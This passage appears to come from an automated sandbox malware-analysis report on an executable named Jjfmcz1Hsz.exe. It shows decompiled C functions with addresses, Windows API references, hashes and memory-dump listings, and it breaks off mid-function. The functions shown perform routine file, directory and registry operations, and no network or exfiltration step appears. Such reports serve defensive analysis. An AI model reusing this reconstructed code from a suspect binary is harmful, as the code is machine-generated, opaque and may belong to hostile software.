                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3677997916-0
                                                                                                                                                                            • Opcode ID: f0b1188a79bc87c14dcfdcab40d7666e728bb1c221bf0190823456a582dcb0bb
                                                                                                                                                                            • Instruction ID: 5ce6926f2417f3d17e5e854e85a0bcf64bccf2bfa1e8e40673093317e398bbc6
                                                                                                                                                                            • Opcode Fuzzy Hash: f0b1188a79bc87c14dcfdcab40d7666e728bb1c221bf0190823456a582dcb0bb
                                                                                                                                                                            • Instruction Fuzzy Hash: A711A771905205EFDF14DF64C6889AEBBB4EF11349F20843FE541B62C0D2B84A85DB5A
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 59%
                                                                                                                                                                            			E00401389(signed int _a4) {
                                                                                                                                                                            				intOrPtr* _t6;
                                                                                                                                                                            				void* _t8;
                                                                                                                                                                            				void* _t10;
                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                            				void* _t12;
                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                            				signed int _t17;
                                                                                                                                                                            				void* _t18;
                                                                                                                                                                            
                                                                                                                                                                            				_t17 = _a4;
                                                                                                                                                                            				while(_t17 >= 0) {
                                                                                                                                                                            					_t6 = _t17 * 0x1c +  *0x423730;
                                                                                                                                                                            					if( *_t6 == 1) {
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					_push(_t6); // executed
                                                                                                                                                                            					_t8 = E00401434(); // executed
                                                                                                                                                                            					if(_t8 == 0x7fffffff) {
                                                                                                                                                                            						return 0x7fffffff;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t10 = E0040136D(_t8);
                                                                                                                                                                            					if(_t10 != 0) {
                                                                                                                                                                            						_t11 = _t10 - 1;
                                                                                                                                                                            						_t16 = _t17;
                                                                                                                                                                            						_t17 = _t11;
                                                                                                                                                                            						_t12 = _t11 - _t16;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t12 = _t10 + 1;
                                                                                                                                                                            						_t17 = _t17 + 1;
                                                                                                                                                                            					}
                                                                                                                                                                            					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                                                                                                            						 *0x422eec =  *0x422eec + _t12;
                                                                                                                                                                            						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x422eec, 0x7530,  *0x422ed4), 0);
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}











                                                                                                                                                                            0x0040138a
                                                                                                                                                                            0x004013fa
                                                                                                                                                                            0x0040139b
                                                                                                                                                                            0x004013a0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004013a2
                                                                                                                                                                            0x004013a3
                                                                                                                                                                            0x004013ad
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00401404
                                                                                                                                                                            0x004013b0
                                                                                                                                                                            0x004013b7
                                                                                                                                                                            0x004013bd
                                                                                                                                                                            0x004013be
                                                                                                                                                                            0x004013c0
                                                                                                                                                                            0x004013c2
                                                                                                                                                                            0x004013b9
                                                                                                                                                                            0x004013b9
                                                                                                                                                                            0x004013ba
                                                                                                                                                                            0x004013ba
                                                                                                                                                                            0x004013c9
                                                                                                                                                                            0x004013cb
                                                                                                                                                                            0x004013f4
                                                                                                                                                                            0x004013f4
                                                                                                                                                                            0x004013c9
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            • Opcode ID: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
                                                                                                                                                                            • Instruction ID: da56ad7cfcb2a9fecb994a09e4a0bd113f750103611445cd7b28aada07ee45e3
                                                                                                                                                                            • Opcode Fuzzy Hash: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
                                                                                                                                                                            • Instruction Fuzzy Hash: 2E012831B24210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00402308(void* __ebx) {
                                                                                                                                                                            				char* _t6;
                                                                                                                                                                            				long _t8;
                                                                                                                                                                            				void* _t15;
                                                                                                                                                                            				long _t19;
                                                                                                                                                                            				void* _t22;
                                                                                                                                                                            				void* _t23;
                                                                                                                                                                            
                                                                                                                                                                            				_t15 = __ebx;
                                                                                                                                                                            				_t26 =  *(_t23 - 0x18) - __ebx;
                                                                                                                                                                            				if( *(_t23 - 0x18) != __ebx) {
                                                                                                                                                                            					_t6 = E00402A3A(0x22);
                                                                                                                                                                            					_t18 =  *(_t23 - 0x18) & 0x00000002;
                                                                                                                                                                            					__eflags =  *(_t23 - 0x18) & 0x00000002;
                                                                                                                                                                            					_t8 = E00402A7A(E00402B2F( *((intOrPtr*)(_t23 - 0x24))), _t6, _t18); // executed
                                                                                                                                                                            					_t19 = _t8;
                                                                                                                                                                            					goto L4;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t22 = E00402B44(_t26, 2);
                                                                                                                                                                            					if(_t22 == __ebx) {
                                                                                                                                                                            						L6:
                                                                                                                                                                            						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t19 = RegDeleteValueA(_t22, E00402A3A(0x33));
                                                                                                                                                                            						RegCloseKey(_t22);
                                                                                                                                                                            						L4:
                                                                                                                                                                            						if(_t19 != _t15) {
                                                                                                                                                                            							goto L6;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t23 - 4));
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}









                                                                                                                                                                            0x00402308
                                                                                                                                                                            0x00402308
                                                                                                                                                                            0x0040230b
                                                                                                                                                                            0x0040233a
                                                                                                                                                                            0x00402342
                                                                                                                                                                            0x00402342
                                                                                                                                                                            0x00402350
                                                                                                                                                                            0x00402355
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040230d
                                                                                                                                                                            0x00402314
                                                                                                                                                                            0x00402318
                                                                                                                                                                            0x004026a6
                                                                                                                                                                            0x004026a6
                                                                                                                                                                            0x0040231e
                                                                                                                                                                            0x0040232e
                                                                                                                                                                            0x00402330
                                                                                                                                                                            0x00402357
                                                                                                                                                                            0x00402359
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040235f
                                                                                                                                                                            0x00402359
                                                                                                                                                                            0x00402318
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x004028de

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,00000270,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                                                                            • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 849931509-0
                                                                                                                                                                            • Opcode ID: 4530b8da9ca6ba3150dfaa5e4a1e2dd15eeb15549dac5782e6def93dd27c7dca
                                                                                                                                                                            • Instruction ID: 0b8f6a46cfbad05769843233fc9109b41d2ceb5d24a7fa4f39b64bc1fd674853
                                                                                                                                                                            • Opcode Fuzzy Hash: 4530b8da9ca6ba3150dfaa5e4a1e2dd15eeb15549dac5782e6def93dd27c7dca
                                                                                                                                                                            • Instruction Fuzzy Hash: CDF04473A00110ABDB10BFA48A4EAAE72799B50345F14443BF201B61C1D9BD4D12966D
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00406092(signed int _a4) {
                                                                                                                                                                            				struct HINSTANCE__* _t5;
                                                                                                                                                                            				signed int _t10;
                                                                                                                                                                            
                                                                                                                                                                            				_t10 = _a4 << 3;
                                                                                                                                                                            				_t8 =  *(_t10 + 0x409240);
                                                                                                                                                                            				_t5 = GetModuleHandleA( *(_t10 + 0x409240));
                                                                                                                                                                            				if(_t5 != 0) {
                                                                                                                                                                            					L2:
                                                                                                                                                                            					return GetProcAddress(_t5,  *(_t10 + 0x409244));
                                                                                                                                                                            				}
                                                                                                                                                                            				_t5 = E00406024(_t8); // executed
                                                                                                                                                                            				if(_t5 == 0) {
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				goto L2;
                                                                                                                                                                            			}





                                                                                                                                                                            0x0040609a
                                                                                                                                                                            0x0040609d
                                                                                                                                                                            0x004060a4
                                                                                                                                                                            0x004060ac
                                                                                                                                                                            0x004060b8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004060bf
                                                                                                                                                                            0x004060af
                                                                                                                                                                            0x004060b6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004060c7
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,?,00403143,00000009), ref: 004060A4
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                                                                                                                                                              • Part of subcall function 00406024: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603B
                                                                                                                                                                              • Part of subcall function 00406024: wsprintfA.USER32 ref: 00406074
                                                                                                                                                                              • Part of subcall function 00406024: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406088
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2547128583-0
                                                                                                                                                                            • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                                                                                                            • Instruction ID: f390ed2799c289b087c769a87f24dfac638062b8da6604b2acd18c4b1555f769
                                                                                                                                                                            • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                                                                                                            • Instruction Fuzzy Hash: B4E08632644111A6D320A7709D0493B72EC9E84710302483EF906F2191D738AC259669
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                            			E0040596C(CHAR* _a4, long _a8, long _a12) {
                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                            				void* _t6;
                                                                                                                                                                            
                                                                                                                                                                            				_t5 = GetFileAttributesA(_a4); // executed
                                                                                                                                                                            				asm("sbb ecx, ecx");
                                                                                                                                                                            				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                                                                                                            				return _t6;
                                                                                                                                                                            			}





                                                                                                                                                                            0x00405970
                                                                                                                                                                            0x0040597d
                                                                                                                                                                            0x00405992
                                                                                                                                                                            0x00405998

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Jjfmcz1Hsz.exe,80000000,00000003), ref: 00405970
                                                                                                                                                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405992
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                                            • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                                                                                                            • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                                                                                                                            • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                                                                                                            • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00405947(CHAR* _a4) {
                                                                                                                                                                            				signed char _t3;
                                                                                                                                                                            				signed char _t7;
                                                                                                                                                                            
                                                                                                                                                                            				_t3 = GetFileAttributesA(_a4); // executed
                                                                                                                                                                            				_t7 = _t3;
                                                                                                                                                                            				if(_t7 != 0xffffffff) {
                                                                                                                                                                            					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t7;
                                                                                                                                                                            			}





                                                                                                                                                                            0x0040594c
                                                                                                                                                                            0x00405952
                                                                                                                                                                            0x00405957
                                                                                                                                                                            0x00405960
                                                                                                                                                                            0x00405960
                                                                                                                                                                            0x00405969

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,?,0040555F,?,?,00000000,00405742,?,?,?,?), ref: 0040594C
                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405960
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                            • Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                                                                                                            • Instruction ID: 96e5362f07f59601f7516fe8bcac2aa0a8151a45168581d09323fa3b8cc485cf
                                                                                                                                                                            • Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                                                                                                            • Instruction Fuzzy Hash: F7D01272908121AFC2102738ED0C89BBF65EB543717058B35FDB9F22F0D7304C568AA6
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00405455(CHAR* _a4) {
                                                                                                                                                                            				int _t2;
                                                                                                                                                                            
                                                                                                                                                                            				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                                                                                                                                            				if(_t2 == 0) {
                                                                                                                                                                            					return GetLastError();
                                                                                                                                                                            				}
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}




                                                                                                                                                                            0x0040545b
                                                                                                                                                                            0x00405463
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405469
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,004030CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 0040545B
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405469
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1375471231-0
                                                                                                                                                                            • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                                                                                                            • Instruction ID: ace853db513f64caea17b5c73fb52fb3118c2a3fabff3065b7385b8b337d2f64
                                                                                                                                                                            • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                                                                                                            • Instruction Fuzzy Hash: 9DC08C30B18101EAC6100B30AE087073D50AB00742F1444356206E10E0C6309050CD2F
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E0040255C(intOrPtr __ebx, void* __edi, void* __esi) {
                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                            				void* _t35;
                                                                                                                                                                            				void* _t38;
                                                                                                                                                                            
                                                                                                                                                                            				 *((intOrPtr*)(_t35 - 8)) = __ebx;
                                                                                                                                                                            				_t26 = E00402A1D(2);
                                                                                                                                                                            				_t38 = _t26 - 1;
                                                                                                                                                                            				 *((intOrPtr*)(_t35 - 0xc)) = _t26;
                                                                                                                                                                            				if(_t38 < 0) {
                                                                                                                                                                            					L24:
                                                                                                                                                                            					 *0x423788 =  *0x423788 +  *(_t35 - 4);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					__ecx = 0x3ff;
                                                                                                                                                                            					if(__eax > 0x3ff) {
                                                                                                                                                                            						 *((intOrPtr*)(__ebp - 0xc)) = 0x3ff;
                                                                                                                                                                            					}
                                                                                                                                                                            					if( *__esi == __bl) {
                                                                                                                                                                            						L21:
                                                                                                                                                                            						__esi =  *((intOrPtr*)(__ebp - 8));
                                                                                                                                                                            						goto L22;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						 *((char*)(__ebp + 0xb)) = __bl;
                                                                                                                                                                            						 *(__ebp - 0x30) = E00405C70(__ecx, __esi);
                                                                                                                                                                            						if( *((intOrPtr*)(__ebp - 0xc)) <= __ebx) {
                                                                                                                                                                            							goto L21;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							__esi =  *((intOrPtr*)(__ebp - 8));
                                                                                                                                                                            							while(1) {
                                                                                                                                                                            								__eax = __ebp - 0xd;
                                                                                                                                                                            								__eax = E004059E4( *(__ebp - 0x30), __ebp - 0xd, 1); // executed
                                                                                                                                                                            								if(__eax == 0) {
                                                                                                                                                                            									break;
                                                                                                                                                                            								}
                                                                                                                                                                            								if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                                                                                                                                                            									 *(__ebp - 0xd) & 0x000000ff = E00405C57(__edi,  *(__ebp - 0xd) & 0x000000ff);
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if( *((char*)(__ebp + 0xb)) == 0xd ||  *((char*)(__ebp + 0xb)) == 0xa) {
                                                                                                                                                                            										__al =  *(__ebp - 0xd);
                                                                                                                                                                            										if( *((intOrPtr*)(__ebp + 0xb)) == __al || __al != 0xd && __al != 0xa) {
                                                                                                                                                                            											__eax = SetFilePointer( *(__ebp - 0x30), 0xffffffff, __ebx, 1);
                                                                                                                                                                            										} else {
                                                                                                                                                                            											 *((char*)(__esi + __edi)) = __al;
                                                                                                                                                                            											__esi = __esi + 1;
                                                                                                                                                                            										}
                                                                                                                                                                            										break;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										__al =  *(__ebp - 0xd);
                                                                                                                                                                            										 *((char*)(__esi + __edi)) = __al;
                                                                                                                                                                            										__esi = __esi + 1;
                                                                                                                                                                            										 *((char*)(__ebp + 0xb)) = __al;
                                                                                                                                                                            										if(__al == __bl) {
                                                                                                                                                                            											break;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											if(__esi <  *((intOrPtr*)(__ebp - 0xc))) {
                                                                                                                                                                            												continue;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												break;
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									}
